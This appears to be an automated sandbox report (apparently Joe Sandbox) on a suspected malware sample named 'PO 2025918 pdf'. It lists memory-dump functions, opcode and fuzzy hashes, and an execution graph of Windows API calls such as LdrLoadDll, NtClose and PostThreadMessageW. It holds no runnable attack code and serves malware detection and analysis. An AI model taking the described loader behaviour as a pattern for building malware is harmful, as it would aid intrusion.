                                                                                • Opcode Fuzzy Hash: 5d2886a856024f936b50ca0b59e84a47417d6e9bf86b20beddcde7b61ad8dd61
                                                                                • Instruction Fuzzy Hash: 03210671900204DFDB05DF58D9C0B56BF65FBA8324F20C569E9090B356C33AE456C6A1
                                                                                Function 0165D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2200103685.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_165d000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: dc47c9c10222cfd3b18f0294f6348640719b19fe497506def52e99ebef75d0fb
                                                                                • Instruction ID: 6654ad4b729875a17c923d8ddff805a124962b8e94404b1f52d0fb5e4148dc5a
                                                                                • Opcode Fuzzy Hash: dc47c9c10222cfd3b18f0294f6348640719b19fe497506def52e99ebef75d0fb
                                                                                • Instruction Fuzzy Hash: AC21F271504204EFDB45DFA8D9C0B26BBA5FB88364F20C56DEE094B396C37AD446CA61
                                                                                Function 0165D01C Relevance: .1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2200103685.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_165d000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 74a3f7f349fd00f791a63efdf03166712e3a81e9eaf7635c363ecbb64a0b2b15
                                                                                • Instruction ID: 67caf362f16bf102ad49c794d1069ef539f6b6db8c430210ceb0e9971e4bc0dd
                                                                                • Opcode Fuzzy Hash: 74a3f7f349fd00f791a63efdf03166712e3a81e9eaf7635c363ecbb64a0b2b15
                                                                                • Instruction Fuzzy Hash: 23210071604200DFDB55DF68D980B26BF65EB88314F20C569DD0A4B396C33AD407CA62
                                                                                Function 0165D005 Relevance: .1, Instructions: 63COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2200103685.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_165d000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 339ddb711001c790a0ee0e0de03c5ed9d6b710d226f5ac527f20550703bc0f57
                                                                                • Instruction ID: 5f1aff4efc9cb3d1e916be1268cf2e962c8626316e9b396cb00bb17f3d87f236
                                                                                • Opcode Fuzzy Hash: 339ddb711001c790a0ee0e0de03c5ed9d6b710d226f5ac527f20550703bc0f57
                                                                                • Instruction Fuzzy Hash: 59219F755083809FDB03CF64D994B15BF71EB46214F28C5EAD8498F3A7C33A980ACB62
                                                                                Function 0164D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2200057038.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_164d000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                • Instruction ID: 48f8ab290eea3465a43d30c58d45e673cd0221bcbcdb846c67ec7b2efc4b649c
                                                                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                • Instruction Fuzzy Hash: 8211CD76804240DFDB02CF54D9C4B56BF61FB94224F24C6A9D9090A256C33AE45ACBA2
                                                                                Function 0165D1CF Relevance: .1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2200103685.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_165d000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                • Instruction ID: 7b6ad5e6ca808f00287655220f27a1a735d1b557363b77d0d606f531517c80b3
                                                                                • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                • Instruction Fuzzy Hash: F411BB75504280DFDB02CF54C9C4B15BFA1FB84224F24C6ADDD494B396C33AD44ACB62

                                                                                Non-executed Functions

                                                                                Function 09323F60 Relevance: 1.4, Strings: 1, Instructions: 166COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'jq
                                                                                • API String ID: 0-3676250632
                                                                                • Opcode ID: 2993504930e45f74c8ad023be92f658bbad5df93e147c28d0a7c3d3ca167caba
                                                                                • Instruction ID: 578479e0838c9a19d26b3e9081fea77d93847484d07f9d0164b2545082cfda60
                                                                                • Opcode Fuzzy Hash: 2993504930e45f74c8ad023be92f658bbad5df93e147c28d0a7c3d3ca167caba
                                                                                • Instruction Fuzzy Hash: 4F6118B0A112098FE748DF6AE951AAA7FFAFFC8300F14D16AD1049B264DF345806CF90
                                                                                Function 09323F70 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'jq
                                                                                • API String ID: 0-3676250632
                                                                                • Opcode ID: 3f41c22f6302da79f58efde8f7f1495bf0a3a9467f970f2adb5d36a959e8b63b
                                                                                • Instruction ID: 2768905bef18eb8da0ce2016dfd078f0d2daf900d2f694117eaefbae5ac58d9f
                                                                                • Opcode Fuzzy Hash: 3f41c22f6302da79f58efde8f7f1495bf0a3a9467f970f2adb5d36a959e8b63b
                                                                                • Instruction Fuzzy Hash: AA61F8B0A152098FE749DF6AE941AAA7BFBFBC8300F14D52AD1049B264DF745806CF94
                                                                                Function 07C24A50 Relevance: .3, Instructions: 334COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2223192289.0000000007C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7c20000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e2a47a561b7dbb31b158924c318049d36745a62e07bd8529d932ff24864c072e
                                                                                • Instruction ID: c76139c24aac078f060845f13c7291849ce87c17f6e59ab9a64cc23df4ed78c6
                                                                                • Opcode Fuzzy Hash: e2a47a561b7dbb31b158924c318049d36745a62e07bd8529d932ff24864c072e
                                                                                • Instruction Fuzzy Hash: EBC1BCB0701B518FEB1ADB75C590B6EB7FAAF89700F148469D14ACB290CB34EE02D751
                                                                                Function 0932D9D8 Relevance: .3, Instructions: 312COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a90d97a64f80113043f81c6674f523592bd25d029144797c2991d798ef3155fc
                                                                                • Instruction ID: f4846f81c7d762918ed0f2ffaaaefcbfe54167382c106ffea1da5ff09d2a6563
                                                                                • Opcode Fuzzy Hash: a90d97a64f80113043f81c6674f523592bd25d029144797c2991d798ef3155fc
                                                                                • Instruction Fuzzy Hash: ABE10B74E001298FDB14DFA9C580AAEFBB2FF89305F248169E415AB356D731AD41CFA0
                                                                                Function 0932CD30 Relevance: .3, Instructions: 312COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bd35c1efd9a35837ef7fa23ddb049527e6486b8db3ba2921e6d2b5137dc1dbdb
                                                                                • Instruction ID: cfffc8faef7d9e4129faf21114154d2d875f732aa495dd641e50529fc9bcf507
                                                                                • Opcode Fuzzy Hash: bd35c1efd9a35837ef7fa23ddb049527e6486b8db3ba2921e6d2b5137dc1dbdb
                                                                                • Instruction Fuzzy Hash: 6DE11A74E001198FDB14DFA8C580AAEFBB2FF89305F249169E519AB356D731AD41CFA0
                                                                                Function 0932D168 Relevance: .3, Instructions: 312COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 461d4974ce64ad8774466fd9016caccc810c40662c5c6b1006f24615b47f19e7
                                                                                • Instruction ID: 879072f7872c5542c3cd0b823bd7a2aa72bfa6c75cbe39c410c04d2629077fd8
                                                                                • Opcode Fuzzy Hash: 461d4974ce64ad8774466fd9016caccc810c40662c5c6b1006f24615b47f19e7
                                                                                • Instruction Fuzzy Hash: 3EE1FA74E001198FDB14DFA9C580AAEFBB2FF89305F248169E515AB356D730AD41CFA0
                                                                                Function 0932F570 Relevance: .3, Instructions: 312COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e3b0f74e305dab8503a8b13331775af4a56d36a2cf9a32c691ad9e5a9f65e005
                                                                                • Instruction ID: e3742554eeecb5fa3732315931e84aaa4e2d14c120539ec2aafff269d14f8ba2
                                                                                • Opcode Fuzzy Hash: e3b0f74e305dab8503a8b13331775af4a56d36a2cf9a32c691ad9e5a9f65e005
                                                                                • Instruction Fuzzy Hash: 16E1E974E001298FDB14DFA9C580AAEFBB2FF89305F248169E515AB356D731AD41CFA0
                                                                                Function 0932D5A0 Relevance: .3, Instructions: 312COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cdc971cd5610a7240c2cdfecc986ead1d5a008d821ee0d1efd33b4e9eb67a6b9
                                                                                • Instruction ID: 05cf349cd128a5dedeacae8259768c787c8b581faaa516f3da912ef3eb648a44
                                                                                • Opcode Fuzzy Hash: cdc971cd5610a7240c2cdfecc986ead1d5a008d821ee0d1efd33b4e9eb67a6b9
                                                                                • Instruction Fuzzy Hash: 6CE10B74E001198FDB14DFA9C580AAEFBB2FF89305F248169E519AB355D734AD41CFA0
                                                                                Function 01A0D8EC Relevance: .3, Instructions: 264COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2200363620.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1a00000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0e16998a67470e6392c452b8ab0cc655a3922fa0a29bf95e13a53bd4a7db4ef0
                                                                                • Instruction ID: 56dd51dac55d6544c9be558807401ddfc2dca67cea9a9e7f98a04f5cf6eff43a
                                                                                • Opcode Fuzzy Hash: 0e16998a67470e6392c452b8ab0cc655a3922fa0a29bf95e13a53bd4a7db4ef0
                                                                                • Instruction Fuzzy Hash: 4BA16032E102068FCF16DFB8D98059EBBB2FF85300B15856AE905BB2A5DB35D956CB40
                                                                                Function 09325180 Relevance: .2, Instructions: 210COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 629f1badd5c64c02dc5908a14958bfcb11be9abfc3265e8968664082d3a285b6
                                                                                • Instruction ID: 4f94e561a09573f9b2e1b9af36419b0843dbc40339c354b3304430f0611f1903
                                                                                • Opcode Fuzzy Hash: 629f1badd5c64c02dc5908a14958bfcb11be9abfc3265e8968664082d3a285b6
                                                                                • Instruction Fuzzy Hash: AF91FF71D05228DFDF14CFA9D8847EEBBBABF49304F10906AE519A7262DB345A85CF40
                                                                                Function 0932F55F Relevance: .1, Instructions: 133COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ca27f0b5f9af6fa3b5b23aa59b7db5666ad243589f795df6c43b55e57e3ede0e
                                                                                • Instruction ID: 57842ab51b26f1b519b41084721428141cf0b1c06996cfea564f707367b45c31
                                                                                • Opcode Fuzzy Hash: ca27f0b5f9af6fa3b5b23aa59b7db5666ad243589f795df6c43b55e57e3ede0e
                                                                                • Instruction Fuzzy Hash: 4A510874E002198FDB14DFA9C9806AEFBF2FF89305F248169D419AB356D7319A41CFA0
                                                                                Function 0932D590 Relevance: .1, Instructions: 133COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2224157504.0000000009320000.00000040.00000800.00020000.00000000.sdmp, Offset: 09320000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_9320000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7649d9bb32e3a7199cc22ec0c21669cadfe1b239fb8d73705151cbe702a140af
                                                                                • Instruction ID: 6edfbe4e329920d6f1e0cc2d0dff9786ae81a7ef17562878e75cd1c64052537d
                                                                                • Opcode Fuzzy Hash: 7649d9bb32e3a7199cc22ec0c21669cadfe1b239fb8d73705151cbe702a140af
                                                                                • Instruction Fuzzy Hash: 90513B74E0021A8BDB14DFA9C9806AEFBF2FF89304F24C169D418A7356D735A941CFA0

                                                                                Execution Graph

                                                                                Execution Coverage:1.3%
                                                                                Dynamic/Decrypted Code Coverage:4.8%
                                                                                Signature Coverage:8.8%
                                                                                Total number of Nodes:147
                                                                                Total number of Limit Nodes:10
                                                                                execution_graph 86461 42fb03 86462 42fb13 86461->86462 86463 42fb19 86461->86463 86466 42eb43 86463->86466 86465 42fb3f 86469 42ccf3 86466->86469 86468 42eb5e 86468->86465 86470 42cd0d 86469->86470 86471 42cd1e RtlAllocateHeap 86470->86471 86471->86468 86472 425023 86473 42503c 86472->86473 86482 4289b3 86473->86482 86475 425087 86487 42ea63 86475->86487 86478 425059 86478->86475 86479 4250c7 86478->86479 86481 4250cc 86478->86481 86480 42ea63 RtlFreeHeap 86479->86480 86480->86481 86483 428a17 86482->86483 86484 428a4e 86483->86484 86490 424d33 86483->86490 86484->86478 86486 428a30 86486->86478 86505 42cd43 86487->86505 86489 425097 86491 424ccf 86490->86491 86492 424cd7 86491->86492 86493 424ceb 86491->86493 86499 424d78 86491->86499 86494 42c9c3 NtClose 86492->86494 86501 42c9c3 86493->86501 86496 424ce0 86494->86496 86496->86486 86497 424cf4 86504 42eb83 RtlAllocateHeap 86497->86504 86499->86486 86500 424cff 86500->86486 86502 42c9e0 86501->86502 86503 42c9f1 NtClose 86502->86503 86503->86497 86504->86500 86506 42cd5d 86505->86506 86507 42cd6e RtlFreeHeap 86506->86507 86507->86489 86508 42bfc3 86509 42bfe0 86508->86509 86512 16d2df0 LdrInitializeThunk 86509->86512 86510 42c008 86512->86510 86513 41e783 86514 41e7a9 86513->86514 86518 41e8a3 86514->86518 86519 42fc33 86514->86519 86516 41e841 86516->86518 86525 42c013 86516->86525 86520 42fba3 86519->86520 86521 42fc00 86520->86521 86522 42eb43 RtlAllocateHeap 86520->86522 86521->86516 86523 42fbdd 86522->86523 86524 42ea63 RtlFreeHeap 86523->86524 86524->86521 86526 42c030 86525->86526 86529 16d2c0a 86526->86529 86527 42c05c 86527->86518 86530 16d2c1f LdrInitializeThunk 86529->86530 86531 16d2c11 86529->86531 86530->86527 86531->86527 86618 413d53 86621 42cc53 86618->86621 86622 42cc70 86621->86622 86625 16d2c70 LdrInitializeThunk 86622->86625 86623 413d72 86625->86623 86626 41b573 86627 41b5b7 86626->86627 86628 41b5d8 86627->86628 86629 42c9c3 NtClose 86627->86629 86629->86628 86630 4142b3 86631 4142cd 86630->86631 86636 417a63 86631->86636 86633 4142eb 86634 41431f PostThreadMessageW 86633->86634 86635 414330 86633->86635 86634->86635 86638 417a87 86636->86638 86637 417a8e 86637->86633 86638->86637 86640 417aad 86638->86640 86643 42fee3 LdrLoadDll 86638->86643 86641 417ada 86640->86641 86642 417ad1 LdrLoadDll 86640->86642 86641->86633 86642->86641 86643->86640 86532 401a44 86533 401a53 86532->86533 86536 42ffd3 86533->86536 86539 42e623 86536->86539 86540 42e649 86539->86540 86551 407563 86540->86551 86542 42e65f 86550 401ac9 86542->86550 86554 41b383 86542->86554 86544 42e67e 86547 42e693 86544->86547 86569 42cd93 86544->86569 86565 428553 86547->86565 86548 42e6ad 86549 42cd93 ExitProcess 86548->86549 86549->86550 86553 407570 86551->86553 86572 416713 86551->86572 86553->86542 86555 41b3af 86554->86555 86585 41b273 86555->86585 86558 41b3dc 86559 41b3e7 86558->86559 86562 42c9c3 NtClose 86558->86562 86559->86544 86560 41b3f4 86561 41b410 86560->86561 86563 42c9c3 NtClose 86560->86563 86561->86544 86562->86559 86564 41b406 86563->86564 86564->86544 86566 4285b5 86565->86566 86568 4285c2 86566->86568 86596 4188c3 86566->86596 86568->86548 86570 42cdad 86569->86570 86571 42cdbe ExitProcess 86570->86571 86571->86547 86573 41672a 86572->86573 86575 416743 86573->86575 86576 42d403 86573->86576 86575->86553 86577 42d41d 86576->86577 86578 4289b3 2 API calls 86577->86578 86580 42d443 86578->86580 86579 42d44c 86579->86575 86580->86579 86581 42c013 LdrInitializeThunk 86580->86581 86582 42d4a9 86581->86582 86583 42ea63 RtlFreeHeap 86582->86583 86584 42d4bf 86583->86584 86584->86575 86586 41b28d 86585->86586 86590 41b369 86585->86590 86591 42c0b3 86586->86591 86589 42c9c3 NtClose 86589->86590 86590->86558 86590->86560 86592 42c0d0 86591->86592 86595 16d35c0 LdrInitializeThunk 86592->86595 86593 41b35d 86593->86589 86595->86593 86597 4188ed 86596->86597 86603 418deb 86597->86603 86604 413f33 86597->86604 86599 418a1a 86600 42ea63 RtlFreeHeap 86599->86600 86599->86603 86601 418a32 86600->86601 86602 42cd93 ExitProcess 86601->86602 86601->86603 86602->86603 86603->86568 86608 413f53 86604->86608 86606 413fbc 86606->86599 86607 413fb2 86607->86599 86608->86606 86609 41b693 NtClose RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 86608->86609 86609->86607 86610 419005 86611 42c9c3 NtClose 86610->86611 86612 41900f 86611->86612 86613 414966 86614 41496a 86613->86614 86615 4289b3 2 API calls 86614->86615 86616 414983 86615->86616 86617 16d2b60 LdrInitializeThunk

                                                                                Executed Functions

                                                                                Function 00417A63 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 73 417a63-417a7f 74 417a87-417a8c 73->74 75 417a82 call 42f643 73->75 76 417a92-417aa0 call 42fc43 74->76 77 417a8e-417a91 74->77 75->74 80 417ab0-417ac1 call 42e0f3 76->80 81 417aa2-417aad call 42fee3 76->81 86 417ac3-417ad7 LdrLoadDll 80->86 87 417ada-417add 80->87 81->80 86->87
                                                                                APIs
                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AD5
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2453984968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_PO 2025918 pdf.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Load
                                                                                • String ID:
                                                                                • API String ID: 2234796835-0
                                                                                • Opcode ID: 796422a0e03da6e05e870b9df345f99345e8cc58a3a3a3b03bc6c72230115a90
                                                                                • Instruction ID: 0800c33516af0022d0b17055a186c9f0e9460697c5db4936c8195cfb473c91ec
                                                                                • Opcode Fuzzy Hash: 796422a0e03da6e05e870b9df345f99345e8cc58a3a3a3b03bc6c72230115a90
                                                                                • Instruction Fuzzy Hash: E00175B1E0010DABDF10DBE1DC42FDEB378AF54308F4081A6E90897241F674EB588B55
                                                                                Function 0042C9C3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 99 42c9c3-42c9ff call 404993 call 42dbe3 NtClose
                                                                                APIs
                                                                                • NtClose.NTDLL(00424CF4,?,-665E6599,?,?,00424CF4,?,00009D57), ref: 0042C9FA
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2453984968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_PO 2025918 pdf.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID:
                                                                                • API String ID: 3535843008-0
                                                                                • Opcode ID: 9b38cc4083fcf95519bbd2f222b190f3b983931ae5abd193463e60ae3ae6f940
                                                                                • Instruction ID: eb656e4eeb6cc65563beea3f5f9dfeb29813091517ec9c3f1aba9bd37f9daa79
                                                                                • Opcode Fuzzy Hash: 9b38cc4083fcf95519bbd2f222b190f3b983931ae5abd193463e60ae3ae6f940
                                                                                • Instruction Fuzzy Hash: 2CE04F756042147BD220AA6ADC41F9B775CDBC9714F508069FA0C67242C675791187B4
                                                                                Function 016D2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 113 16d2b60-16d2b6c LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 3ba9f0fcc7bc19f0458089a45cda1161002dd30b81ae155e293da09be22d61ad
                                                                                • Instruction ID: 7717d4a7af475cfb367eba90537a68cc4a00c137075e44ac92c6ad4b089dc974
                                                                                • Opcode Fuzzy Hash: 3ba9f0fcc7bc19f0458089a45cda1161002dd30b81ae155e293da09be22d61ad
                                                                                • Instruction Fuzzy Hash: 49900261203400034105755C4818617404E97E0201B55C121E5014A90EC52589916225
                                                                                Function 016D2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 115 16d2df0-16d2dfc LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 7cea0886b692f664765ac71469c9d8494c71fabb930bb38183d12fa6bad13526
                                                                                • Instruction ID: 6ed4820aada1423bbf4f4f60d513ca7212ab44ff512a5394069aea06052cb639
                                                                                • Opcode Fuzzy Hash: 7cea0886b692f664765ac71469c9d8494c71fabb930bb38183d12fa6bad13526
                                                                                • Instruction Fuzzy Hash: 0D90023120240413D111755C4908707004D97D0241F95C512A4424A58ED6568A52A221
                                                                                Function 016D2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 114 16d2c70-16d2c7c LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: ed9efaa1c8d3ac3407ac468c2208da610f02fb1f1333d04e92eb47bb83164ff9
                                                                                • Instruction ID: 288f8675e09a690ddc82b374e771f448b7ced65557117f7ad838067794e8dc42
                                                                                • Opcode Fuzzy Hash: ed9efaa1c8d3ac3407ac468c2208da610f02fb1f1333d04e92eb47bb83164ff9
                                                                                • Instruction Fuzzy Hash: 0290023120248802D110755C880874B004997D0301F59C511A8424B58EC69589917221
                                                                                Function 016D35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 116 16d35c0-16d35cc LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 6c43f64ee2cb80540d37f59dc510ecfb205e1d162f12ce7948337010f5abd823
                                                                                • Instruction ID: c0b37a149e9c0b9247451601b2fb4c6281ec8de63b7ad062405388ed698ba3bb
                                                                                • Opcode Fuzzy Hash: 6c43f64ee2cb80540d37f59dc510ecfb205e1d162f12ce7948337010f5abd823
                                                                                • Instruction Fuzzy Hash: 9590023160650402D100755C4918707104997D0201F65C511A4424A68EC7958A5166A2
                                                                                Function 004142B3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • PostThreadMessageW.USER32(-4108694,00000111,00000000,00000000), ref: 0041432A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2453984968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
